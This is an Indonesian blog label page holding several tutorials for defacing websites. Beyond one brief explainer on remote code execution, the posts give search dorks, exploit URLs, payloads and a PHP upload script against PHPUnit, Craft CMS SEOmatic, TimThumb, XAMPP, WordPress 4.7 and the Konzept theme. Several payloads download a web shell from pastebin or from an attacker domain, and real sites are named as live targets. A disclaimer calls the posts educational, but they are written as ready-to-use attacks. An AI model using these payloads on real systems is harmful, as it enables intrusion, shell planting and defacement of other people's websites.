Tampilkan postingan dengan label Deface. Tampilkan semua postingan
Tampilkan postingan dengan label Deface. Tampilkan semua postingan

Senin, 27 Juli 2020

Apa Itu RCE (Remote Code Execution) dan apa dampak pada bug ini ?

Hallo ^_^ kali ini saya akan share tentang Apa itu RCE (Remote Code Execution) dan apa dampak pada bug ini ?



Apa itu RCE (Remote Code Execution)


RCE (Remote Command Injection) adalah Dimana penyerang dapat memerintah sistem untuk menjalankan kode yang dinginkan,
Tipe attack seperti ini biasanya karena kurangnya validasi terhadap data yang bisa dikendalikan oleh user.

Apa dampak RCE (Remote Code Execution)


Seorang penyerang yang mampu mengeksekusi cacat seperti itu biasanya dapat mengeksekusi perintah dengan hak istimewa dari bahasa pemrograman atau server web.
Pada banyak bahasa dia dapat mengeluarkan perintah sistem, menulis, menghapus atau membaca file atau terhubung ke database.

Mungkin sekian dulu dari saya mengenai artikel tentang Apa itu RCE (Remote Code Execution) dan apa dampak pada bug ini.

NOTE: "Semua artikel tutorial di blog ini hanya untuk sebatas Pembelajaran dan Pengetahuan saja, jika kalian meyalahgunakan tutorial di blog ini, itu bukan tanggung jawab saya."

Minggu, 26 Juli 2020

Exploit Laravel PHPUnit RCE ( Remote Code Execution )

Hallo ^_^  kali ini saya akan share tutorial poc cara deface dengan Exploit Laravel PHPUnit RCE ( Remote Code Execution )


Pertama Dorking dulu dengan dork dibawah in bro

DORK :

inurl:/vendor/phpunit/phpunit/src
inurl:/phpunit/src/Util/PHP/

Exploit  : 

/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

Ok ku anggap kalian sudah punya tagetnya, langsung saja kita exploitnya seperti ini
Disini kalian bebas untuk mengirim datanya menggunakan Burp Suite, Postman, atau curl pun bisa.
Disini saya menggunakan curl untuk mengirimkan datanya karena simple dan tidak ribet hehe.
Untuk penggunaanya cukup gunakan parameter -d atau --data

Payload yang bisa digunakan :

<?php echo php_uname(); ?>
<?php echo system('id'); ?>

Contoh command

curl -d "<?php echo php_uname(); ?>" http://taget.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php


Kalau ingin Upload Shell tinggal ubah payloadnya menjadi seperti ini :

<?php system('wget https://pastebin.com/raw/i7VyUpWu -O zero.php'; ?>


Setelah itu buka access Shell kalian di 

http://taget.com/vendor/phpunit/phpunit/src/Util/PHP/zero.php


Mungkin sekian dulu dari saya mengenai artikel tentang tutorial poc cara deface dengan Exploit Laravel PHPUnit RCE ( Remote Code Execution )

NOTE: "Semua artikel tutorial di blog ini hanya untuk sebatas Pembelajaran dan Pengetahuan saja, jika kalian meyalahgunakan tutorial di blog ini, itu bukan tanggung jawab saya."


Tag : phpunit rce, laravel phpunit rce, laravel framework phpunit rce exploit, laravel rce, laravel phpunit remote code execution


Kamis, 23 Juli 2020

Cara Deface Dengan Exploit SSTI ( Server Side Template Injection )

Hello para hacker, kali ini saya akan share tutorial Cara Deface Dengan Exploit SSTI ( Server Side Template Injection )




Pertama dorking dulu dengan dork ini bro

inurl:/humans.txt intext:"Craft CMS"
intext:SEOmatic filetype:txt
site:*/humans.txt intext:SEOmatic
/* TEAM */ inurl:/humans.txt

Exploit :

/actions/seomatic/meta-container/all-meta-containers?uri=

ok ku anggap kalian dah punya targetnya langsung saja kita exploit targetnya seperti ini

jika vuln akan tampil seperti ini


Nah Sudah Menemukan Website Yang Vuln? Selanjutnya Kita Melakukan upload shell dengan RCE Atau Remote Code Excution.

https://site.com/actions/seomatic/meta-container/all-meta-containers?uri={{craft.app.view.evaluateDynamicContent(%27print(system(%22curl\x20https://pastebin.com/raw/i7VyUpWu\x20%3E\x20zero.php%22));%27)}} 

Nah Seperti Ini Kalian Bisa Mengubah Link Pastebin dan Juga extensi Shell kalian Sesuai Selera Masing Masing.

Setelah itu buka acesss Shell kalian di

https://site.com/zero.php

Mungkin sekian dulu dari saya mengenai artikel tutorial Cara Deface Dengan Exploit SSTI ( Server Side Template Injection )

NOTE: "Semua artikel tutorial di blog ini hanya untuk sebatas Pembelajaran dan Pengetahuan saja, jika kalian meyalahgunakan tutorial di blog ini, itu bukan tanggung jawab saya."


Tag : SSTI, Server Side Template Injection, SSTI TO RCE, SSTI PAYLOAD, Server side template injection tutorial, Server side template injection payload, Server side template injection exploit.

Senin, 22 Oktober 2018

Cara deface dengan Exploit Timthumb V1.XX RCE

Hello ^^ kali ini saya akan share Cara deface dengan Exploit Timthumb V1.XX RCE
yuk langsung saja ke tutorialnya,


Dork : inurl:/timthumb.php 
atau bisa kalian pake dengan List Dork Timthumb V1.XX RCE disini
Exploit : timthumb.php?src=http://flickr.com.tukangpompajakarta.com/shell.php


Disini saya punya live targetnya => http://cityfordhcm.com/timthumb.php
Untuk ciri ciri web vuln rce timthumb seperti gambar dibawah ini .

jika sudah menemukan website yang seperti itu kita langsung saja exploit seperti ini 
http://cityfordhcm.com/timthumb.php?src=http://flickr.com.tukangpompajakarta.com/shell.php
nanti akan keluar seperti gambar dibawah ini atau seperti ini

Unable to open image : /home/cityfordhcm/public_html/cache/external_66b043a706b2265ea1b66330089ac2a0.php
Query String : src=http://flickr.com.tukangpompajakarta.com/shell.php
TimThumb version : 1.30


Untuk akses shell di timthumb bisa di liat di unable to open image  berati di http://cityfordhcm.com/cache/external_66b043a706b2265ea1b66330089ac2a0.php 
Setelah itu kalian buka http://cityfordhcm.com/cache/dedot.php untuk upload shell :D

Mungkin sekian dulu  dari saya mengenai artikel Cara deface dengan Exploit Timthumb V1.XX RCE semoga bermanfaat..

Cara deface dengan XAMPP Local Write Access

Hello ^^ kali ini saya akan share Cara deface dengan XAMPP Local Write Access 
yuk langsung saja ke tutorialnya,


Dork :
inurl:/xampp/index.php intitle:XAMPP
inurl:/xampp/lang.php
inurl:/security/lang.php
inurl:/xampp/splash.php 

Exploit :
- localhost/xampp/lang.php?hacked_by_h0d3_g4n
- localhost/security/lang.php?hacked_by_
h0d3_g4n

Tutorial :

1. Cari targetnya pake Dork diatas.

2. Masukan salah satu exploitnya. contoh  
http://motasaindonesia.co.id/xampp/lang.php?hacked_by_h0d3_g4n

3. Ada notice seperti berikut. Abaikan saja :D . 




4. Lalu akses hasil defacenya. contoh http://www.motasaindonesia.co.id/xampp/lang.tmp



Mungkin sekian dulu  dari saya mengenai artikel Cara deface dengan XAMPP Local Write Access  semoga bermanfaat. 

Kamis, 01 Februari 2018

Cara Deface Dengan Exploit Wordpress Content Injection 4.7.0/4.7.1

Hello para defacer Indonesia, kali ini saya akan share Cara Deface Dengan Exploit Wordpress Content Injection 4.7.0/4.7.1

Pertama dorking dulu dengan dork ini bro
inurl:/wp-includes/rest-api
Exploit :
http://target.com/wp-json/wp/v2/posts/
Vuln seperti gambar dibawah ini
copy idnya

untuk script exploitnya kalian bisa copy disini
https://www.exploit-db.com/exploits/41224/
edit bagian  
"title" => "You have been hacked",
"content" => "Hacked please update your wordpress version"

Save dengan format .rb

untuk pengguna windows kalian bisa install ruby dulu 
kebetulan saya menggunakan linux jadi langsung saja buka cmd
dan ketikan  ruby wpinject.rb





lalu masukan target http://target.com/ dan idnya yang tadi di copy


setelah itu tekan enter jika vuln akan tampil seperti ini Jika Tidak vuln Muncul Pesan "This site is not Vulnerable"






setelah itu Copas Link Tersebut Dan Buka Di Browser




mungkin sekian dulu dari saya mengenai artikel Cara Deface Dengan Exploit Wordpress Content Injection 4.7.0/4.7.1 
Semoga bermanfaat

Rabu, 31 Januari 2018

Cara Deface Dengan Exploit Wordpress Themes Konzept

Heloo Gan hehehe
kali ini mau share Cara Deface Dengan Exploit Wordpress Themes Konzept, ok langsung saja,

Pertama Dorking dulu gan dengan dork ini,
inurl:/includes/uploadify/uploads



ok ku anggap kalian dah punya targetnya langsung saja kita exploit targetnya seperti ini

http://target.com/wp-content/themes/konzept/includes/uploadify/upload.php

jika vuln akan tampil seperti ini

{"jsonrpc" : "2.0", "result" : null, "id" : "id"}


 siapkan shell kalian dan rubah format shellnya menjadi .jpg
 dan copy code php dibawah ini 
<?php

$url = "http://target.com/wp-content/themes/konzept/includes/uploadify/upload.php"; // put URL Here
$post = array
(
       "file" => "@lol.jpg",
       "name" => "lol.php"
);
$ch = curl_init ("$url");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);
echo "$data\n";

?>

ganti target.com dengan web target kalian yng mau di upload shell
ganti tulisan warna biru dengan shell kalian yang telah dirubah formatnya menjadi .jpg
ganti tulisan warna merah sesuai nama shell kalian setelah itu
save code php diatas tadi dengan format .php

Langkah selanjutnya jika pengguna windows menggunakan xampp kalau pengguna linux lansung saja .
ketikan di cmd php Konzept.php tekan enter dan akan muncul {"jsonrpc" : "2.0", "result" : null, "id" : "id"}



setelah itu buka shell acesss kalian di
http://target.com/wp-content/themes/konzept/includes/uploadify/uploads/namashell.php
 
atau
http://target.com/wp-content/themes/konzept/includes/uploadify/uploads/lol.php




mungkin sekian dulu dari saya mengenai artikel Cara Deface Dengan Exploit Wordpress Themes Konzept  semoga bermanfaat